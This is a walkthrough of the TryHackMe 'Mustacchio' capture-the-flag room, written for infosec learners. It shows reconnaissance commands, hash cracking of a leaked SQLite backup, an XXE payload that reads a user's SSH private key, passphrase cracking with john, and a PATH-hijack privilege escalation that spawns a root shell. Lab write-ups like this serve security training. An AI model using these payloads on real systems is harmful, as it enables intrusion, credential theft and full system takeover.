THM Mustacchio Walkthrough
TryHackMe is a popular service that offers CTF- and Walkthrough-like rooms in order to help people interested in infosec gaining new knowledge. The TryHackMe Mustacchio Room is an rather easy CTF that includes LFI through XML, hash cracking and a simple privilege escalation by manipulating the PATH variable.THM Room: here
Information Gathering
As usual let's begin with a nmap to gain information about the THM Mustacchio machine:
sudo nmap -p 1-10000 -sV -v 10.10.62.15
This presents us three open ports:
- Port 22: OpenSSH 7.2p2 Ubuntu
- Port 80: Apache httpd 2.4.18
- Port 8765: nginx 1.10.3
Next, I used gobuster to enumerate the web server on port 80:
gobuster dir -u http://10.10.62.15/ -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 50
Gobuster found a directory called custom
which contains a folder called "js" and one called "css".
CSS is probably not interesting for us so let's start with the js folder.
Inside that folder we have a file called users.bak that we can download. Using file users.bak
I checked the filetype which is a SQLite 3.x database.
Now, we can either simply try to dump strings using strings users.bak
or you use some sort of Database Browser like sqlitebrowser
that can be installed via apt-get.
No matter how you proceed you will get the same result (a DB Browser probably looks prettier but it doesn't really matter in that case).
For this THM Mustacchio walkthrough I used strings which makes it easier to display the result here:
└──╼ $strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Gaining access
Using hashcat we can crack that hash (SHA1 format):
hashcat -m 100 hashfile ~/Lists/Wordlists/rockyou.txt
to display the plaintext password add a --show
after hashcat to the command (or use: !! --show
).
Unfortunately, the credentials can not be used to log into a SSH session but we have another webservice to enumerate (remember port 8765).
The webservice on port 8765 displays us a login panel for an admin panel; there the credentials can be used.
Taking a look at the source code of the panel we got the following comment:
0<!-- Barry, you can now SSH in using your key!-->
Also, it looks like the textbox takes in XML code as the name of the textare is "xml".
Ok, so the default location for a SSH key is /home/user/.ssh/id_rsa
, let's try to display that using LFI and the following payload:
0<?xml version="1.0"?>
1 <!DOCTYPE foo [
2 <!ELEMENT foo ANY >
3 <!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa" >
4 ]>
5 <feed>
6 <name>&nop;</name>
7 <Subject>nop</Subject>
8 <Content>nop</Content>
9 </feed>
This read the file and displays it in the name paragraph; if the file does not exist or is not readable it won't display anything but we were successful.
Gaining access via SSH
If you try to start a SSH session using the key and ssh [email protected] -i id_rsa
you will get prompted with the following:
Enter passphrase for key 'id_rsa':
which means we have to crack the password first as the keyfile is encrypted.
Luckily John The Ripper in combination with its toolset is perfect for that scenario.
Using ssh2john we can convert the keyfile into a hash that can be bruteforced using john itself.
(python ssh2john.py id_rsa > id_john
)
Now, we can bruteforce the password with: john id_rsa ~/Lists/Wordlists/rockyou.txt --format=SSH
Finally you are able to log in using ssh and obtain the first flag
Privilege escalation
After navigating into the home directory of joe you can see an ELF file owned by root that got the SUID bit set and everybody is allowed to execute it.
When executing the file it simply shows us the nginx access.log file and doesn't take any user input.
I tried to extract information using strings live_log
and found the command that's executed to display the logfile: tail -f /var/log/nginx/access.log
.
This is a very easy privilege escalation, we just have to modify the PATH variable so that "our tail" executable gets used instead of the original one.
First I created a file called "tail" in my home directory with the following content:
0#!/usr/bin/python3
1
2import pty;
3pty.spawn('/bin/bash')
Next I modified the PATH variable using: export PATH=$PWD:$PATH
, this sets my working directory (which is my home directory) in front of the original PATH string.
This results in my tail executable being executing when executing the live_log file.
Eventuall, you get a root shell and through that the system flag.
I hope you liked that TryHackMe Mustacchio Walkthrough, as always if you got any questions feel free to reach out to me.
Tags:
THM, TryHackMe, Mustacchio